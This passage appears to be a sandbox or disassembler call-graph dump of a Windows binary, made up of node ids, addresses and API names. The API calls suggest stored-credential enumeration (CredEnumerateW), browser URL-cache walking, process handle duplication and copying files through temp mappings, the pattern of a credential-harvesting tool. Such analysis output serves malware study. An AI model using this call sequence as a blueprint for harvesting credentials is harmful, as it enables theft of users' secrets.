38401 445680 38401->38388 38648 4087b3 memset 38401->38648 38412 445bf3 38403->38412 38405->38383 38415 445dde 38406->38415 38894 409b98 GetFileAttributesW 38407->38894 38417 445ce1 38408->38417 38409->38398 38422 409d1f 6 API calls 38412->38422 38413 445928 38413->38424 38830 40b6ef 38413->38830 38425 40b2cc 27 API calls 38415->38425 38918 409b98 GetFileAttributesW 38417->38918 38421 40b2cc 27 API calls 38429 445a94 38421->38429 38431 445c07 38422->38431 38432 445d54 _wcsicmp 38423->38432 38424->38347 38436 4459ed 38424->38436 38435 445def 38425->38435 38426 4459cb 38426->38436 38443 40b6ef 249 API calls 38426->38443 38427->38380 38427->38393 38427->38394 38428 445389 255 API calls 38428->38363 38782 40ae18 38429->38782 38430 44566d 38430->38343 38699 413d4c 38430->38699 38439 445389 255 API calls 38431->38439 38440 445d71 38432->38440 38504 445d67 38432->38504 38434 445665 38814 40b1ab free free 38434->38814 38441 409d1f 6 API calls 38435->38441 38436->38350 38477 445b22 38436->38477 38445 445c17 38439->38445 38919 445093 23 API calls 38440->38919 38448 445e03 38441->38448 38443->38436 38444 4456d8 38450 40b2cc 27 API calls 38444->38450 38451 40b2cc 27 API calls 38445->38451 38447 44563c 38447->38434 38453 4087b3 337 API calls 38447->38453 38920 409b98 GetFileAttributesW 38448->38920 38449 40b6ef 249 API calls 38449->38380 38455 4456e2 38450->38455 38456 445c23 38451->38456 38452 445d83 38452->38380 38453->38447 38816 413fa6 _wcsicmp _wcsicmp 38455->38816 38460 409d1f 6 API calls 38456->38460 38458 445e12 38465 445e6b 38458->38465 38472 40b2cc 27 API calls 38458->38472 38463 445c37 38460->38463 38461 445aa1 38464 445b17 38461->38464 38481 445ab2 memset 38461->38481 38495 409d1f 6 API calls 38461->38495 38789 40add4 38461->38789 38794 445389 38461->38794 38803 40ae51 38461->38803 38462 4456eb 38468 4456fd memset memset memset memset 38462->38468 38469 4457ea 38462->38469 38470 445389 255 API calls 38463->38470 38895 40aebe 38464->38895 38922 445093 23 API calls 38465->38922 38817 409c70 wcscpy wcsrchr 38468->38817 38820 413d29 38469->38820 38476 445c47 38470->38476 38478 445e33 38472->38478 38474 445e7e 38480 445f67 38474->38480 38483 40b2cc 27 API calls 38476->38483 38477->38363 38477->38364 38479 409d1f 6 API calls 38478->38479 38484 445e47 38479->38484 38485 40b2cc 27 API calls 38480->38485 38486 40b2cc 27 API calls 38481->38486 38488 445c53 38483->38488 38921 409b98 GetFileAttributesW 38484->38921 38490 445f73 38485->38490 38486->38461 38487 409c70 2 API calls 38491 44577e 38487->38491 38492 409d1f 6 API calls 38488->38492 38494 409d1f 6 API calls 38490->38494 38496 409c70 2 API calls 38491->38496 38497 445c67 38492->38497 38493 445e56 38493->38465 38501 445e83 memset 38493->38501 38498 445f87 38494->38498 38495->38461 38499 44578d 38496->38499 38500 445389 255 API calls 38497->38500 38925 409b98 GetFileAttributesW 38498->38925 38499->38469 38506 40b2cc 27 API calls 38499->38506 38500->38363 38505 40b2cc 27 API calls 38501->38505 38504->38380 38504->38449 38507 445eab 38505->38507 38508 4457a8 38506->38508 38509 409d1f 6 API calls 38507->38509 38510 409d1f 6 API calls 38508->38510 38511 445ebf 38509->38511 38512 4457b8 38510->38512 38513 40ae18 9 API calls 38511->38513 38819 409b98 GetFileAttributesW 38512->38819 38523 445ef5 38513->38523 38515 4457c7 38515->38469 38516 4087b3 337 API calls 38515->38516 38516->38469 38517 40ae51 9 API calls 38517->38523 38518 445f5c 38519 40aebe FindClose 38518->38519 38519->38480 38520 40add4 2 API calls 38520->38523 38521 40b2cc 27 API calls 38521->38523 38522 409d1f 6 API calls 38522->38523 38523->38517 38523->38518 38523->38520 38523->38521 38523->38522 38525 445f3a 38523->38525 38923 409b98 GetFileAttributesW 38523->38923 38924 445093 23 API calls 38525->38924 38527->38324 38528->38327 38529->38324 38530->38319 38532 40c775 38531->38532 38926 40b1ab free free 38532->38926 38534 40c788 38927 40b1ab free free 38534->38927 38536 40c790 38928 40b1ab free free 38536->38928 38538 40c798 38539 40aa04 free 38538->38539 38540 40c7a0 38539->38540 38929 40c274 memset 38540->38929 38545 40a8ab 9 API calls 38546 40c7c3 38545->38546 38547 40a8ab 9 API calls 38546->38547 38548 40c7d0 38547->38548 38958 40c3c3 38548->38958 38552 40c7e5 38553 40c877 38552->38553 38554 40c86c 38552->38554 38560 40c634 49 API calls 38552->38560 38983 40a706 38552->38983 38561 40bdb0 38553->38561 39000 4053fe 39 API calls 38554->39000 38560->38552 39168 404363 38561->39168 38564 40bf5d 39188 40440c 38564->39188 38566 40bdee 38566->38564 38569 40b2cc 27 API calls 38566->38569 38567 40bddf CredEnumerateW 38567->38566 38570 40be02 wcslen 38569->38570 38570->38564 38577 40be1e 38570->38577 38571 40be26 wcsncmp 38571->38577 38574 40be7d memset 38575 40bea7 memcpy 38574->38575 38574->38577 38576 40bf11 wcschr 38575->38576 38575->38577 38576->38577 38577->38564 38577->38571 38577->38574 38577->38575 38577->38576 38578 40b2cc 27 API calls 38577->38578 38580 40bf43 LocalFree 38577->38580 39191 40bd5d 28 API calls 38577->39191 39192 404423 38577->39192 38579 40bef6 _wcsnicmp 38578->38579 38579->38576 38579->38577 38580->38577 38581 4135f7 39205 4135e0 38581->39205 38584 40b2cc 27 API calls 38585 41360d 38584->38585 38586 40a804 8 API calls 38585->38586 38587 413613 38586->38587 38588 41361b 38587->38588 38589 41363e 38587->38589 38591 40b273 27 API calls 38588->38591 38590 4135e0 FreeLibrary 38589->38590 38592 413643 38590->38592 38593 413625 GetProcAddress 38591->38593 38592->38354 38593->38589 38594 413648 38593->38594 38595 413658 38594->38595 38596 4135e0 FreeLibrary 38594->38596 38595->38354 38597 413666 38596->38597 38597->38354 39208 4449b9 38598->39208 38601 444c1f 38601->38334 38602 4449b9 42 API calls 38604 444b4b 38602->38604 38603 444c15 38605 4449b9 42 API calls 38603->38605 38604->38603 39229 444972 GetVersionExW 38604->39229 38605->38601 38607 444b99 memcmp 38612 444b8c 38607->38612 38608 444c0b 39233 444a85 42 API calls 38608->39233 38612->38607 38612->38608 39230 444aa5 42 API calls 38612->39230 39231 40a7a0 GetVersionExW 38612->39231 39232 444a85 42 API calls 38612->39232 38615 40399d 38614->38615 39234 403a16 38615->39234 38617 403a09 39248 40b1ab free free 38617->39248 38619 4039a3 38619->38617 38623 4039f4 38619->38623 39245 40a02c CreateFileW 38619->39245 38620 403a12 wcsrchr 38620->38341 38623->38617 38624 4099c6 2 API calls 38623->38624 38624->38617 38626 414c2e 15 API calls 38625->38626 38627 404048 38626->38627 38628 414c2e 15 API calls 38627->38628 38629 404056 38628->38629 38630 409d1f 6 API calls 38629->38630 38631 404073 38630->38631 38632 409d1f 6 API calls 38631->38632 38633 40408e 38632->38633 38634 409d1f 6 API calls 38633->38634 38635 4040a6 38634->38635 38636 403af5 20 API calls 38635->38636 38637 4040ba 38636->38637 38638 403af5 20 API calls 38637->38638 38639 4040cb 38638->38639 39275 40414f memset 38639->39275 38641 4040e0 38642 404140 38641->38642 38644 4040ec memset 38641->38644 38646 4099c6 2 API calls 38641->38646 38647 40a8ab 9 API calls 38641->38647 39289 40b1ab free free 38642->39289 38644->38641 38645 404148 38645->38401 38646->38641 38647->38641 39302 40a6e6 WideCharToMultiByte 38648->39302 38650 4087ed 39303 4095d9 memset 38650->39303 38653 408809 memset memset memset memset memset 38654 40b2cc 27 API calls 38653->38654 38655 4088a1 38654->38655 38656 409d1f 6 API calls 38655->38656 38657 4088b1 38656->38657 38658 40b2cc 27 API calls 38657->38658 38659 4088c0 38658->38659 38660 409d1f 6 API calls 38659->38660 38661 4088d0 38660->38661 38662 40b2cc 27 API calls 38661->38662 38663 4088df 38662->38663 38664 409d1f 6 API calls 38663->38664 38665 4088ef 38664->38665 38666 40b2cc 27 API calls 38665->38666 38667 4088fe 38666->38667 38668 409d1f 6 API calls 38667->38668 38669 40890e 38668->38669 38670 40b2cc 27 API calls 38669->38670 38671 40891d 38670->38671 38672 409d1f 6 API calls 38671->38672 38673 40892d 38672->38673 39322 409b98 GetFileAttributesW 38673->39322 38675 40893e 38676 408943 38675->38676 38677 408958 38675->38677 39323 407fdf 75 API calls 38676->39323 38698 408953 38698->38401 38700 40b633 free 38699->38700 38701 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38700->38701 38702 413f00 Process32NextW 38701->38702 38703 413da5 OpenProcess 38702->38703 38704 413f17 CloseHandle 38702->38704 38705 413df3 memset 38703->38705 38708 413eb0 38703->38708 38704->38444 39614 413f27 38705->39614 38707 413ebf free 38707->38708 38708->38702 38708->38707 38709 4099f4 3 API calls 38708->38709 38709->38708 38711 413e37 GetModuleHandleW 38712 413e1f 38711->38712 38713 413e46 GetProcAddress 38711->38713 38712->38711 39619 413959 38712->39619 39635 413ca4 38712->39635 38713->38712 38715 413ea2 CloseHandle 38715->38708 38717 414c2e 15 API calls 38716->38717 38718 403eb7 38717->38718 38719 414c2e 15 API calls 38718->38719 38720 403ec5 38719->38720 38721 409d1f 6 API calls 38720->38721 38722 403ee2 38721->38722 38723 409d1f 6 API calls 38722->38723 38724 403efd 38723->38724 38725 409d1f 6 API calls 38724->38725 38726 403f15 38725->38726 38727 403af5 20 API calls 38726->38727 38728 403f29 38727->38728 38729 403af5 20 API calls 38728->38729 38730 403f3a 38729->38730 38731 40414f 33 API calls 38730->38731 38732 403f4f 38731->38732 38733 403faf 38732->38733 38735 403f5b memset 38732->38735 38737 4099c6 2 API calls 38732->38737 38738 40a8ab 9 API calls 38732->38738 39649 40b1ab free free 38733->39649 38735->38732 38736 403fb7 38736->38383 38737->38732 38738->38732 38740 414c2e 15 API calls 38739->38740 38741 403d26 38740->38741 38742 414c2e 15 API calls 38741->38742 38743 403d34 38742->38743 38744 409d1f 6 API calls 38743->38744 38745 403d51 38744->38745 38746 409d1f 6 API calls 38745->38746 38747 403d6c 38746->38747 38748 409d1f 6 API calls 38747->38748 38749 403d84 38748->38749 38750 403af5 20 API calls 38749->38750 38751 403d98 38750->38751 38752 403af5 20 API calls 38751->38752 38753 403da9 38752->38753 38754 40414f 33 API calls 38753->38754 38760 403dbe 38754->38760 38755 403e1e 39650 40b1ab free free 38755->39650 38756 403dca memset 38756->38760 38758 403e26 38758->38398 38759 4099c6 2 API calls 38759->38760 38760->38755 38760->38756 38760->38759 38761 40a8ab 9 API calls 38760->38761 38761->38760 38763 414b81 9 API calls 38762->38763 38764 414c40 38763->38764 38765 414c73 memset 38764->38765 39651 409cea 38764->39651 38766 414c94 38765->38766 39654 414592 RegOpenKeyExW 38766->39654 38770 414c64 38770->38377 38771 414cc1 38772 414cf4 wcscpy 38771->38772 39655 414bb0 wcscpy 38771->39655 38772->38770 38774 414cd2 39656 4145ac RegQueryValueExW 38774->39656 38776 414ce9 38776->38772 38778 409d43 wcscpy 38777->38778 38780 409d62 38777->38780 38779 409719 2 API calls 38778->38779 38781 409d51 wcscat 38779->38781 38780->38421 38781->38780 38783 40aebe FindClose 38782->38783 38784 40ae21 38783->38784 38785 4099c6 2 API calls 38784->38785 38786 40ae35 38785->38786 38787 409d1f 6 API calls 38786->38787 38788 40ae49 38787->38788 38788->38461 38790 40ade0 38789->38790 38791 40ae0f 38789->38791 38790->38791 38792 40ade7 wcscmp 38790->38792 38791->38461 38792->38791 38793 40adfe wcscmp 38792->38793 38793->38791 38795 40ae18 9 API calls 38794->38795 38797 4453c4 38795->38797 38796 40ae51 9 API calls 38796->38797 38797->38796 38798 4453f3 38797->38798 38799 40add4 2 API calls 38797->38799 38802 445403 250 API calls 38797->38802 38800 40aebe FindClose 38798->38800 38799->38797 38801 4453fe 38800->38801 38801->38461 38802->38797 38804 40ae7b FindNextFileW 38803->38804 38805 40ae5c FindFirstFileW 38803->38805 38806 40ae94 38804->38806 38807 40ae8f 38804->38807 38805->38806 38809 40aeb6 38806->38809 38810 409d1f 6 API calls 38806->38810 38808 40aebe FindClose 38807->38808 38808->38806 38809->38461 38810->38809 38811->38373 38812->38353 38813->38447 38814->38430 38815->38430 38816->38462 38818 409c89 38817->38818 38818->38487 38819->38515 38821 413d39 38820->38821 38822 413d2f FreeLibrary 38820->38822 38823 40b633 free 38821->38823 38822->38821 38824 413d42 38823->38824 38825 40b633 free 38824->38825 38826 413d4a 38825->38826 38826->38343 38827->38346 38828->38390 38829->38413 38831 44db70 38830->38831 38832 40b6fc memset 38831->38832 38833 409c70 2 API calls 38832->38833 38834 40b732 wcsrchr 38833->38834 38835 40b743 38834->38835 38836 40b746 memset 38834->38836 38835->38836 38837 40b2cc 27 API calls 38836->38837 38838 40b76f 38837->38838 38839 409d1f 6 API calls 38838->38839 38840 40b783 38839->38840 39657 409b98 GetFileAttributesW 38840->39657 38842 40b792 38843 40b7c2 38842->38843 38845 409c70 2 API calls 38842->38845 39658 40bb98 38843->39658 38847 40b7a5 38845->38847 38850 40b2cc 27 API calls 38847->38850 38848 40b837 CloseHandle 38852 40b83e memset 38848->38852 38849 40b817 39692 409a45 GetTempPathW 38849->39692 38853 40b7b2 38850->38853 39691 40a6e6 WideCharToMultiByte 38852->39691 38856 409d1f 6 API calls 38853->38856 38854 40b827 38854->38852 38856->38843 38857 40b866 38858 444432 120 API calls 38857->38858 38859 40b879 38858->38859 38860 40b273 27 API calls 38859->38860 38861 40bad5 38859->38861 38862 40b89a 38860->38862 38863 40b04b ??3@YAXPAX 38861->38863 38864 438552 133 API calls 38862->38864 38865 40baf3 38863->38865 38866 40b8a4 38864->38866 38865->38424 38867 40bacd 38866->38867 38869 4251c4 136 API calls 38866->38869 38868 443d90 110 API calls 38867->38868 38868->38861 38892 40b8b8 38869->38892 38870 40bac6 39704 424f26 122 API calls 38870->39704 38871 40b8bd memset 39695 425413 17 API calls 38871->39695 38874 425413 17 API calls 38874->38892 38877 40a71b MultiByteToWideChar 38877->38892 38878 40a734 MultiByteToWideChar 38878->38892 38881 40b9b5 memcmp 38881->38892 38882 4099c6 2 API calls 38882->38892 38883 404423 37 API calls 38883->38892 38886 4251c4 136 API calls 38886->38892 38887 40bb3e memset memcpy 39705 40a734 MultiByteToWideChar 38887->39705 38889 40bb88 LocalFree 38889->38892 38892->38870 38892->38871 38892->38874 38892->38877 38892->38878 38892->38881 38892->38882 38892->38883 38892->38886 38892->38887 38893 40ba5f memcmp 38892->38893 39696 4253ef 16 API calls 38892->39696 39697 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38892->39697 39698 4253af 17 API calls 38892->39698 39699 4253cf 17 API calls 38892->39699 39700 447280 memset 38892->39700 39701 447960 memset memcpy memcpy memcpy 38892->39701 39702 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38892->39702 39703 447920 memcpy memcpy memcpy 38892->39703 38893->38892 38894->38426 38896 40aed1 38895->38896 38897 40aec7 FindClose 38895->38897 38896->38477 38897->38896 38899 4099d7 38898->38899 38900 4099da memcpy 38898->38900 38899->38900 38900->38400 38902 40b2cc 27 API calls 38901->38902 38903 44543f 38902->38903 38904 409d1f 6 API calls 38903->38904 38905 44544f 38904->38905 39797 409b98 GetFileAttributesW 38905->39797 38907 44545e 38908 445476 38907->38908 38910 40b6ef 249 API calls 38907->38910 38909 40b2cc 27 API calls 38908->38909 38911 445482 38909->38911 38910->38908 38912 409d1f 6 API calls 38911->38912 38913 445492 38912->38913 39798 409b98 GetFileAttributesW 38913->39798 38915 4454a1 38916 4454b9 38915->38916 38917 40b6ef 249 API calls 38915->38917 38916->38428 38917->38916 38918->38427 38919->38452 38920->38458 38921->38493 38922->38474 38923->38523 38924->38523 38925->38504 38926->38534 38927->38536 38928->38538 38930 414c2e 15 API calls 38929->38930 38931 40c2ae 38930->38931 39001 40c1d3 38931->39001 38936 40c3be 38953 40a8ab 38936->38953 38937 40afcf 2 API calls 38938 40c2fd FindFirstUrlCacheEntryW 38937->38938 38939 40c3b6 38938->38939 38940 40c31e wcschr 38938->38940 38941 40b04b ??3@YAXPAX 38939->38941 38942 40c331 38940->38942 38943 40c35e FindNextUrlCacheEntryW 38940->38943 38941->38936 38945 40a8ab 9 API calls 38942->38945 38943->38940 38944 40c373 GetLastError 38943->38944 38946 40c3ad FindCloseUrlCache 38944->38946 38947 40c37e 38944->38947 38948 40c33e wcschr 38945->38948 38946->38939 38949 40afcf 2 API calls 38947->38949 38948->38943 38950 40c34f 38948->38950 38951 40c391 FindNextUrlCacheEntryW 38949->38951 38952 40a8ab 9 API calls 38950->38952 38951->38940 38951->38946 38952->38943 39095 40a97a 38953->39095 38956 40a8cc 38956->38545 38957 40a8d0 7 API calls 38957->38956 39100 40b1ab free free 38958->39100 38960 40c3dd 38961 40b2cc 27 API calls 38960->38961 38962 40c3e7 38961->38962 39101 414592 RegOpenKeyExW 38962->39101 38964 40c3f4 38965 40c50e 38964->38965 38966 40c3ff 38964->38966 38980 405337 38965->38980 38967 40a9ce 4 API calls 38966->38967 38968 40c418 memset 38967->38968 39102 40aa1d 38968->39102 38971 40c471 38973 40c47a _wcsupr 38971->38973 38972 40c505 38972->38965 38974 40a8d0 7 API calls 38973->38974 38975 40c498 38974->38975 38976 40a8d0 7 API calls 38975->38976 38977 40c4ac memset 38976->38977 38978 40aa1d 38977->38978 38979 40c4e4 RegEnumValueW 38978->38979 38979->38972 38979->38973 39104 405220 38980->39104 38984 4099c6 2 API calls 38983->38984 38985 40a714 _wcslwr 38984->38985 38986 40c634 38985->38986 39161 405361 38986->39161 38989 40c65c wcslen 39164 4053b6 39 API calls 38989->39164 38990 40c71d wcslen 38990->38552 38992 40c677 38993 40c713 38992->38993 39165 40538b 39 API calls 38992->39165 39167 4053df 39 API calls 38993->39167 38996 40c6a5 38996->38993 38997 40c6a9 memset 38996->38997 38998 40c6d3 38997->38998 39166 40c589 43 API calls 38998->39166 39000->38553 39002 40ae18 9 API calls 39001->39002 39008 40c210 39002->39008 39003 40ae51 9 API calls 39003->39008 39004 40c264 39005 40aebe FindClose 39004->39005 39007 40c26f 39005->39007 39006 40add4 2 API calls 39006->39008 39013 40e5ed memset memset 39007->39013 39008->39003 39008->39004 39008->39006 39009 40c231 _wcsicmp 39008->39009 39010 40c1d3 34 API calls 39008->39010 39009->39008 39011 40c248 39009->39011 39010->39008 39026 40c084 21 API calls 39011->39026 39014 414c2e 15 API calls 39013->39014 39015 40e63f 39014->39015 39016 409d1f 6 API calls 39015->39016 39017 40e658 39016->39017 39027 409b98 GetFileAttributesW 39017->39027 39019 40e667 39020 409d1f 6 API calls 39019->39020 39022 40e680 39019->39022 39020->39022 39028 409b98 GetFileAttributesW 39022->39028 39023 40e68f 39024 40c2d8 39023->39024 39029 40e4b2 39023->39029 39024->38936 39024->38937 39026->39008 39027->39019 39028->39023 39050 40e01e 39029->39050 39031 40e593 39032 40e5b0 39031->39032 39033 40e59c DeleteFileW 39031->39033 39034 40b04b ??3@YAXPAX 39032->39034 39033->39032 39036 40e5bb 39034->39036 39035 40e521 39035->39031 39073 40e175 39035->39073 39038 40e5c4 CloseHandle 39036->39038 39039 40e5cc 39036->39039 39038->39039 39041 40b633 free 39039->39041 39040 40e573 39043 40e584 39040->39043 39044 40e57c CloseHandle 39040->39044 39042 40e5db 39041->39042 39046 40b633 free 39042->39046 39094 40b1ab free free 39043->39094 39044->39043 39045 40e540 39045->39040 39093 40e2ab 30 API calls 39045->39093 39048 40e5e3 39046->39048 39048->39024 39051 406214 22 API calls 39050->39051 39052 40e03c 39051->39052 39053 40e16b 39052->39053 39054 40dd85 74 API calls 39052->39054 39053->39035 39055 40e06b 39054->39055 39055->39053 39056 40afcf ??2@YAPAXI ??3@YAXPAX 39055->39056 39057 40e08d OpenProcess 39056->39057 39058 40e0a4 GetCurrentProcess DuplicateHandle 39057->39058 39062 40e152 39057->39062 39059 40e0d0 GetFileSize 39058->39059 39060 40e14a CloseHandle 39058->39060 39063 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39059->39063 39060->39062 39061 40e160 39065 40b04b ??3@YAXPAX 39061->39065 39062->39061 39064 406214 22 API calls 39062->39064 39066 40e0ea 39063->39066 39064->39061 39065->39053 39067 4096dc CreateFileW 39066->39067 39068 40e0f1 CreateFileMappingW 39067->39068 39069 40e140 CloseHandle CloseHandle 39068->39069 39070 40e10b MapViewOfFile 39068->39070 39069->39060 39071 40e13b CloseHandle 39070->39071 39072 40e11f WriteFile UnmapViewOfFile 39070->39072 39071->39069 39072->39071 39074 40e18c 39073->39074 39075 406b90 11 API calls 39074->39075 39076 40e19f 39075->39076 39077 40e1a7 memset 39076->39077 39078 40e299 39076->39078 39083 40e1e8 39077->39083 39079 4069a3 ??3@YAXPAX free 39078->39079 39080 40e2a4 39079->39080 39080->39045 39081 406e8f 13 API calls 39081->39083 39082 406b53 SetFilePointerEx ReadFile 39082->39083 39083->39081 39083->39082 39084 40dd50 _wcsicmp 39083->39084 39085 40e283 39083->39085 39089 40742e 8 API calls 39083->39089 39090 40aae3 wcslen wcslen _memicmp 39083->39090 39091 40e244 _snwprintf 39083->39091 39084->39083 39086 40e291 39085->39086 39087 40e288 free 39085->39087 39088 40aa04 free 39086->39088 39087->39086 39088->39078 39089->39083 39090->39083 39092 40a8d0 7 API calls 39091->39092 39092->39083 39093->39045 39094->39031 39097 40a980 39095->39097 39096 40a8bb 39096->38956 39096->38957 39097->39096 39098 40a995 _wcsicmp 39097->39098 39099 40a99c wcscmp 39097->39099 39098->39097 39099->39097 39100->38960 39101->38964 39103 40aa23 RegEnumValueW 39102->39103 39103->38971 39103->38972 39105 405335 39104->39105 39106 40522a 39104->39106 39105->38552 39107 40b2cc 27 API calls 39106->39107 39108 405234 39107->39108 39109 40a804 8 API calls 39108->39109 39110 40523a 39109->39110 39149 40b273 39110->39149 39112 405248 _mbscpy _mbscat GetProcAddress 39113 40b273 27 API calls 39112->39113 39114 405279 39113->39114 39152 405211 GetProcAddress 39114->39152 39116 405282 39117 40b273 27 API calls 39116->39117 39118 40528f 39117->39118 39153 405211 GetProcAddress 39118->39153 39120 405298 39121 40b273 27 API calls 39120->39121 39122 4052a5 39121->39122 39154 405211 GetProcAddress 39122->39154 39124 4052ae 39125 40b273 27 API calls 39124->39125 39126 4052bb 39125->39126 39155 405211 GetProcAddress 39126->39155 39128 4052c4 39129 40b273 27 API calls 39128->39129 39130 4052d1 39129->39130 39156 405211 GetProcAddress 39130->39156 39132 4052da 39133 40b273 27 API calls 39132->39133 39134 4052e7 39133->39134 39157 405211 GetProcAddress 39134->39157 39136 4052f0 39137 40b273 27 API calls 39136->39137 39138 4052fd 39137->39138 39158 405211 GetProcAddress 39138->39158 39140 405306 39141 40b273 27 API calls 39140->39141 39142 405313 39141->39142 39159 405211 GetProcAddress 39142->39159 39144 40531c 39145 40b273 27 API calls 39144->39145 39146 405329 39145->39146 39160 405211 GetProcAddress 39146->39160 39148 405332 39148->39105 39150 40b58d 27 API calls 39149->39150 39151 40b18c 39150->39151 39151->39112 39152->39116 39153->39120 39154->39124 39155->39128 39156->39132 39157->39136 39158->39140 39159->39144 39160->39148 39162 405220 39 API calls 39161->39162 39163 405369 39162->39163 39163->38989 39163->38990 39164->38992 39165->38996 39166->38993 39167->38990 39169 40440c FreeLibrary 39168->39169 39170 40436d 39169->39170 39171 40a804 8 API calls 39170->39171 39172 404377 39171->39172 39173 404383 39172->39173 39174 404405 39172->39174 39175 40b273 27 API calls 39173->39175 39174->38564 39174->38566 39174->38567 39176 40438d GetProcAddress 39175->39176 39177 40b273 27 API calls 39176->39177 39178 4043a7 GetProcAddress 39177->39178 39179 40b273 27 API calls 39178->39179 39180 4043ba GetProcAddress 39179->39180 39181 40b273 27 API calls 39180->39181 39182 4043ce GetProcAddress 39181->39182 39183 40b273 27 API calls 39182->39183 39184 4043e2 GetProcAddress 39183->39184 39185 4043f1 39184->39185 39186 4043f7 39185->39186 39187 40440c FreeLibrary 39185->39187 39186->39174 39187->39174 39189 404413 FreeLibrary 39188->39189 39190 40441e 39188->39190 39189->39190 39190->38581 39191->38577 39193 40447e 39192->39193 39194 40442e 39192->39194 39193->38577 39195 40b2cc 27 API calls 39194->39195 39196 404438 39195->39196 39197 40a804 8 API calls 39196->39197 39198 40443e 39197->39198 39199 404445 39198->39199 39200 404467 39198->39200 39201 40b273 27 API calls 39199->39201 39200->39193 39203 404475 FreeLibrary 39200->39203 39202 40444f GetProcAddress 39201->39202 39202->39200 39204 404460 39202->39204 39203->39193 39204->39200 39206 4135f6 39205->39206 39207 4135eb FreeLibrary 39205->39207 39206->38584 39207->39206 39209 4449c4 39208->39209 39210 444a52 39208->39210 39211 40b2cc 27 API calls 39209->39211 39210->38601 39210->38602 39212 4449cb 39211->39212 39213 40a804 8 API calls 39212->39213 39214 4449d1 39213->39214 39215 40b273 27 API calls 39214->39215 39216 4449dc GetProcAddress 39215->39216 39217 40b273 27 API calls 39216->39217 39218 4449f3 GetProcAddress 39217->39218 39219 40b273 27 API calls 39218->39219 39220 444a04 GetProcAddress 39219->39220 39221 40b273 27 API calls 39220->39221 39222 444a15 GetProcAddress 39221->39222 39223 40b273 27 API calls 39222->39223 39224 444a26 GetProcAddress 39223->39224 39225 40b273 27 API calls 39224->39225 39226 444a37 GetProcAddress 39225->39226 39227 40b273 27 API calls 39226->39227 39228 444a48 GetProcAddress 39227->39228 39228->39210 39229->38612 39230->38612 39231->38612 39232->38612 39233->38603 39235 403a29 39234->39235 39249 403bed memset memset 39235->39249 39237 403ae7 39262 40b1ab free free 39237->39262 39238 403a3f memset 39243 403a2f 39238->39243 39240 403aef 39240->38619 39241 409d1f 6 API calls 39241->39243 39242 409b98 GetFileAttributesW 39242->39243 39243->39237 39243->39238 39243->39241 39243->39242 39244 40a8d0 7 API calls 39243->39244 39244->39243 39246 40a051 GetFileTime CloseHandle 39245->39246 39247 4039ca CompareFileTime 39245->39247 39246->39247 39247->38619 39248->38620 39250 414c2e 15 API calls 39249->39250 39251 403c38 39250->39251 39252 409719 2 API calls 39251->39252 39253 403c3f wcscat 39252->39253 39254 414c2e 15 API calls 39253->39254 39255 403c61 39254->39255 39256 409719 2 API calls 39255->39256 39257 403c68 wcscat 39256->39257 39263 403af5 39257->39263 39260 403af5 20 API calls 39261 403c95 39260->39261 39261->39243 39262->39240 39264 403b02 39263->39264 39265 40ae18 9 API calls 39264->39265 39274 403b37 39265->39274 39266 403bdb 39268 40aebe FindClose 39266->39268 39267 40add4 wcscmp wcscmp 39267->39274 39269 403be6 39268->39269 39269->39260 39270 40a8d0 7 API calls 39270->39274 39271 40ae18 9 API calls 39271->39274 39272 40ae51 9 API calls 39272->39274 39273 40aebe FindClose 39273->39274 39274->39266 39274->39267 39274->39270 39274->39271 39274->39272 39274->39273 39276 409d1f 6 API calls 39275->39276 39277 404190 39276->39277 39290 409b98 GetFileAttributesW 39277->39290 39279 40419c 39280 4041a7 6 API calls 39279->39280 39281 40435c 39279->39281 39282 40424f 39280->39282 39281->38641 39282->39281 39284 40425e memset 39282->39284 39286 409d1f 6 API calls 39282->39286 39287 40a8ab 9 API calls 39282->39287 39291 414842 39282->39291 39284->39282 39285 404296 wcscpy 39284->39285 39285->39282 39286->39282 39288 4042b6 memset memset _snwprintf wcscpy 39287->39288 39288->39282 39289->38645 39290->39279 39294 41443e 39291->39294 39293 414866 39293->39282 39295 41444b 39294->39295 39296 414451 39295->39296 39297 4144a3 GetPrivateProfileStringW 39295->39297 39298 414491 39296->39298 39299 414455 wcschr 39296->39299 39297->39293 39301 414495 WritePrivateProfileStringW 39298->39301 39299->39298 39300 414463 _snwprintf 39299->39300 39300->39301 39301->39293 39302->38650 39304 40b2cc 27 API calls 39303->39304 39305 409615 39304->39305 39306 409d1f 6 API calls 39305->39306 39307 409625 39306->39307 39332 409b98 GetFileAttributesW 39307->39332 39309 409634 39310 409648 39309->39310 39333 4091b8 memset 39309->39333 39312 40b2cc 27 API calls 39310->39312 39314 408801 39310->39314 39313 40965d 39312->39313 39315 409d1f 6 API calls 39313->39315 39314->38653 39314->38698 39316 40966d 39315->39316 39385 409b98 GetFileAttributesW 39316->39385 39318 40967c 39318->39314 39319 409681 39318->39319 39386 409529 72 API calls 39319->39386 39321 409690 39321->39314 39322->38675 39323->38698 39332->39309 39387 40a6e6 WideCharToMultiByte 39333->39387 39335 409202 39388 444432 39335->39388 39338 40b273 27 API calls 39339 409236 39338->39339 39434 438552 39339->39434 39342 409383 39344 40b273 27 API calls 39342->39344 39346 409399 39344->39346 39348 438552 133 API calls 39346->39348 39367 4093a3 39348->39367 39352 4094ff 39463 443d90 39352->39463 39355 4251c4 136 API calls 39355->39367 39359 4093df 39462 424f26 122 API calls 39359->39462 39361 4253cf 17 API calls 39361->39367 39365 40951d 39365->39310 39367->39352 39367->39355 39367->39359 39367->39361 39369 4093e4 39367->39369 39460 4253af 17 API calls 39369->39460 39375 4093ed 39385->39318 39386->39321 39387->39335 39484 4438b5 39388->39484 39390 44444c 39396 409215 39390->39396 39498 415a6d 39390->39498 39392 4442e6 11 API calls 39394 44469e 39392->39394 39393 444486 39395 4444b9 memcpy 39393->39395 39433 4444a4 39393->39433 39394->39396 39398 443d90 110 API calls 39394->39398 39502 415258 39395->39502 39396->39338 39396->39365 39398->39396 39399 444524 39400 444541 39399->39400 39401 44452a 39399->39401 39505 444316 39400->39505 39402 416935 16 API calls 39401->39402 39402->39433 39405 444316 18 API calls 39406 444563 39405->39406 39407 444316 18 API calls 39406->39407 39408 44456f 39407->39408 39409 444316 18 API calls 39408->39409 39433->39392 39572 438460 39434->39572 39436 409240 39436->39342 39437 4251c4 39436->39437 39584 424f07 39437->39584 39439 4251e4 39440 4251f7 39439->39440 39441 4251e8 39439->39441 39592 4250f8 39440->39592 39591 4446ea 11 API calls 39441->39591 39460->39375 39462->39352 39464 443da3 39463->39464 